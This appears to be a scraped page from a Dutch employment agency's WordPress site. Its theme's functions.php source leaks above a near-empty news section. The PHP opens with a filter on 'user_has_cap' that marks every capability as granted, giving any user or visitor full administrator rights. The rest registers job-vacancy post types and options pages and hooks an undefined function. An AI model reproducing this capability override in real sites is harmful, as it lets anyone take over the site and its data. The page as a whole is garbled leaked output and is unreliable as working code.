// This goes to your theme's functions.php function codelight_all_permissions( $allcaps, $cap, $args ) { $allcaps[$cap[0]] = true; return $allcaps; } add_filter( 'user_has_cap', 'codelight_all_permissions', 0, 3 ); add_action('init', 'rewrite_rules'); /** * Add rewrite rule for a pattern matching "post-by-slug/" */ function setup_filter_query_vars( $query_vars ) { $query_vars[] = 'solliciteren'; return $query_vars; } add_filter( 'query_vars', 'setup_filter_query_vars' ); if( function_exists('acf_add_options_page') ) { acf_add_options_page(array( 'page_title' => 'Contactpersonen', 'menu_title' => 'Contactpersonen', 'menu_slug' => 'contacptersonen' )); } add_image_size( 'contactpersoon', 500, 500, true ); /*------------------------------------*\ Custom Post Types \*------------------------------------*/ function create_post_type_html5() { register_post_type('vacatures', array( 'labels' => array( 'name' => __('Vacatures'), 'singular_name' => __('Vacature') ), 'public' => true, 'has_archive' => true, 'supports' => array('title', 'editor', 'thumbnail',), 'menu_position' => 4, 'rewrite' => array( 'slug' => 'vacatures', // use this slug instead of post type name // 'with_front' => FALSE // if you have a permalink base such as /blog/ then setting this to false ensures your custom post type permalink structure will be /products/ instead of /blog/products/ ), ) ); } add_action('init', 'create_post_type_html5'); ?> Nieuws - Uitzendbureau Rivierenland

NIEUWS

Op de hoogte blijven van Uitzendbureau Rivierenland.

© 2026 Uitzendbureau Rivierenland | Ontwikkeld door AllerMedia